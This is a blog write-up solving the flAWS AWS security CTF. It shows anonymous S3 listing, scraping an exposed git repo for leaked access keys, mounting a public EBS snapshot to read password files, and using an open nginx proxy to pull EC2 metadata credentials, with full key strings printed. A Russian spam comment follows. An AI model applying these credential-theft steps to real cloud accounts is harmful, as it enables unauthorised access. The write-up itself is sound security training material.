Solving flAWS

There is quite interesting “always open” CTF challenge, wherein one should use AWS specific security mistakes (flaws) to solve it. Funny enough, its name is flAWS. There are 6 total levels with increasing difficulty. Each level contains several hints for those who stuck. Below are my steps of trying to solve the flAWS challenge.

Level 1

Text clearly hints us to buckets, so it’s about AWS S3 buckets. There are several AWS regions, but clearly resides on us-west-2:

$ dig +short
$ dig -x +short

So, we can tamper URL for corresponding bucket in that region: The secret can be seen there.

Level 2

I already had configured aws CLI utility for my AWS account, so it was very simple:

$ aws s3 ls s3://
2017-02-27 04:02:15      80751 everyone.png
2017-03-03 05:47:17       1433 hint1.html
2017-02-27 04:04:39       1035 hint2.html
2017-02-27 04:02:14       2786 index.html
2017-02-27 04:02:14         26 robots.txt
2017-02-27 04:02:15       1051 secret-e4443fc.html

Otherwise, you should register free AWS account, add IAM user with S3 access, then configure aws CLI tool, then run command above.

Level 3

The same approach:

$ aws s3 ls s3://
                           PRE .git/
2017-02-27 02:14:33     123637 authenticated_users.png
2017-02-27 02:14:34       1552 hint1.html
2017-02-27 02:14:34       1426 hint2.html
2017-02-27 02:14:35       1247 hint3.html
2017-02-27 02:14:33       1035 hint4.html
2017-02-27 04:05:16       1703 index.html
2017-02-27 02:14:33         26 robots.txt

Apparently, there is a git repository here. Let’s download it by parsing S3 bucket listing:


for FILE in $(curl -s $BASEURL | xml_pp | sed -rn '//s/.*(.+)<\/Key>.*/\1/p') ; do
    mkdir -p $(dirname $FILE)
    curl -s $BASEURL$FILE -o $FILE

Now we have copy of git repo. Let’s look into it:

$ git log
commit b64c8dcfa8a39af06521cf4cb7cdce5f0ca9e526 (HEAD -> master)
Author: 0xdabbad00 
Date:   Sun Sep 17 09:10:43 2017 -0600

    Oops, accidentally added something I shouldn't have

commit f52ec03b227ea6094b04e43f475fb0126edb5a61
Author: 0xdabbad00 
Date:   Sun Sep 17 09:10:07 2017 -0600

    first commit

What’s changed in the last commit?

$ git diff HEAD~1
diff --git a/access_keys.txt b/access_keys.txt
deleted file mode 100644
index e3ae6dd..0000000
--- a/access_keys.txt
+++ /dev/null
@@ -1,2 +0,0 @@
-access_key AKIAJ366LIPB4IJKT7SA
-secret_access_key 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

So, someone committed secret credentials into repo and then “removed” them by second commit.
We can use these credentials by adding them to ~/.aws/credentials:

aws_access_key_id = AKIAJ366LIPB4IJKT7SA
aws_secret_access_key = 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
region = us-west-2

This IAM user has access to S3, so we can use that:

$ aws s3 ls --profile flaws
2017-02-12 23:31:07
2017-05-29 19:34:53 config-bucket-975426262029
2017-02-12 22:03:24 flaws-logs
2017-02-05 05:40:07
2017-02-24 03:54:13
2017-02-26 20:15:44
2017-02-26 20:16:06
2017-02-26 21:44:51
2017-02-26 21:47:58
2017-02-26 22:06:32

Here, we can see domains for all next levels, but actual solutions are located in the subdirectories, so there is no profit. However, level4 domain works fine.

Level 4

We need login and password to get into that page. It is said that there exist snapshot for the EC2 instance, so we can search for it:

$ aws --profile flaws ec2 describe-snapshots > snapshots.json

This command took ~5 minutes to run. In the snapshots.json file we can see the snapshot named flaws backup 2017.02.27, its SnapshotId is snap-0b49342abd1bdcb89. Let’s try to search for it in the EBS public snapshots of us-west-2 region:

As I had my free-tier EC2 instance running in the other region (us-east-2), I had to copy snapshot there, create volume from it, attach the volume to my instance and then mount it:

# mount /dev/sdf1 /mnt

Now, we have encrypted password here:

# cat /mnt/etc/nginx/.htpasswd

John the Ripper was not able to crack the password in half an hour, so I had to check for other opportunities. In short, the solution was in the home directory of ubuntu user:

# cat /mnt/home/ubuntu/ 
htpasswd -b /etc/nginx/.htpasswd flaws nCP8xigdjpjyiXgJ7nJu7rw5Ro68iE8M

Some more interesting points regarding this snapshot:
1. You can bypass the password and skip to the next level, just by looking in the /var/www/html/index.html contents.
2. There are some hints for the next level in the /mnt/home/ubuntu/.bash_history file:


3. nginx proxy_pass configuration, which also will be useful in the next level:

        location  ~* ^/proxy/((?U).+)/(.*)$ {
          limit_except GET {
            deny   all;
          limit_req zone=one burst=1;
          set $proxyhost '$1';
	  set $proxyuri '$2';

	  proxy_limit_rate 4096;
	  proxy_set_header X-Real-IP $remote_addr;
	  proxy_set_header Host      $proxyhost;

          proxy_pass http://$proxyhost/$proxyuri;

Level 5

Test the proxy:

$ curl

Now, let’s use .bash_history hint:

$ curl
  "Code" : "Success",
  "LastUpdated" : "2018-02-17T17:18:20Z",
  "Type" : "AWS-HMAC",
  "SecretAccessKey" : "5CoWWPLfBElhMr2ObBeM9ci1YKyLxpYxn2vq/R6B",
  "Token" : "FQoDYXdzEML//////////wEaDI7Qf4V3tL0C629kLSK3A9UCrbmtuFjiNYswHgrvw1ZK3ZtG5TrnzcfFTjmrW1UMXvMt/fX3niZH9HQNp1P4OUdIhJyMxWMINFgotcBR3aDGREB68XT/tc90HoJkBFDfmItIOBNF/bmxY2s6UycUO4ATJxOUQw+g0apPiQ4WolHFVI4rdubp1KN3eKwFcovLSr72ClLsjUgc0sH8oDuqk+4UZS7rW8u/hyvMK0ZT77kpYJgqf4UHC/SxcDhKXXsqKW2p5WtXYwCtacdJTOHjhRzjFk44+z3oqf6wCWS45abiv6TYR+p7ZT/xzGb6zZpu8KRQA2xs4oSiFV6NfNQKU2/NVyk7dKVdbH29sTtexMwdyxxdiD64QH4L33jVL4ld9wLkHLz7mStGQ4Pl6JoLWIEQEd6B6KjSOcs+qeaR9PXrsrNXuntIBMo7YJahycKaVi9+QxWomI363tgheVmg1aY7qBirDNBVrMTl7it90dNEKpRPzfSqlUQeSVmnSMLTuoMxWSlSwHe9o+w8dUdZgYpa2DAxigh9pvJ/WpRLzfcG/5nqAmGpSrhX8N590QlBcxdwkNQx79AXO+fs/oXcMKkVHKTGwt0ovceh1AU=",
  "Expiration" : "2018-02-17T23:46:43Z"

Hereby, we’ve got temporary secret keys for gaining permissions, which were originally granted to this EC2 instance. We can add these credentials to ~/.aws/credentials, as well:

aws_access_key_id = ASIAIGQ3CHKDYV4VWOHA
aws_secret_access_key = hfrgtU6Uj5g7SUey5hwm42NsjypzTMVPjUKj6U/R
aws_session_token = FQoDYXdzEMP//////////wEaDDTJOG3y2jaxgO1IpCK3A4mxF4mM0ozP5WRdFXnYyLaB+E/Q0OTBKvuol3J3K7NN9KSi0I4SFIgPbJ35iNqRO3LbuokDKC0TNd4GfoWtGtxuVf2wlTjPkyTuMnFcfOrVcq1z/YWOrHBBn807eMTfhTE+HkoH25HHwBoBWgjXDuXAyp58E5EDX5ykXXLoo+RE1t1q6v7CRolpixozoen0e7qWzVx7mLodIGGM6a+SQwXN9skVjR+vTOIPbalrUe7t8RhlVsAvEclr/ArImoCHu0I+K9LHzct5OXnzsHeTIlYQs/cR5EvU3Af80157zX8sYxOxajrod1hm7Cfoo+C52eL28cokdRKTpfKYDPDhAB8XnCC4L+9MS2YEVEtxvd9OL9mJitSFWAcqg9JBKnc1Gm8tEzhMMVO1MbcHdlQNqdYC8R785j79Flpp+sxfD0cRy9cCa2v5GH6ZWIhr0DT41ubLNjZheYB7/3xmrr1yIxOMaVFppBU5e+KyJrC5tGc/wouhJ/x3Y4hE/V9ULggl9TSiFb/5nl0J2eFSAmZArzAcUBQyWkLEm5Z109bZjTanAprrYgWxCVGLjzjQnbu0U4dRf/+yxlgozeOh1AU=

Let’s use it:

$ aws --profile proxy s3 ls s3://
                           PRE ddcc78ff/
2017-02-27 04:11:07        871 index.html

Level 6

I started by looking what exactly the SecurityAudit policy is.

Again, let’s add new credentials into ~/.aws/credentials:

aws_access_key_id = AKIAJFQ6E7BY57Q3OBGA
aws_secret_access_key = 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
region = us-west-2

I tried to use Cloudtrail, but without luck:

$ aws --profile audit cloudtrail describe-trails
    "trailList": [
            "S3KeyPrefix": "cloudtrail",
            "IncludeGlobalServiceEvents": true,
            "TrailARN": "arn:aws:cloudtrail:us-west-2:975426262029:trail/cloudtrail",
            "HasCustomEventSelectors": false,
            "Name": "cloudtrail",
            "HomeRegion": "us-west-2",
            "S3BucketName": "flaws-logs",
            "LogFileValidationEnabled": true,
            "IsMultiRegionTrail": true

$ aws --profile audit cloudtrail lookup-events
An error occurred (AccessDeniedException) when calling the LookupEvents operation: User: arn:aws:iam::975426262029:user/Level6 is not authorized to perform: cloudtrail:LookupEvents

In the end, I gave up and had to follow all the hints. The last puzzle was quite complicated.

Kudos to Scott Piper for this interesting challenge, from which I learnt some things about Amazon Web Services.

Похожие статьи

One thought on “Solving flAWS”

  1. Добрый день.
    Представляю вашему вниманию игру Rich Birds где вы можете заработать реальные деньги.
    При регистрации по ссылке вы получите 1000 серебра и сможете купить свою первую курицу, которая будет нести вам яйца.
    Яйца вы сможете продать за реальные деньги.

Leave a Reply

Your email address will not be published. Required fields are marked *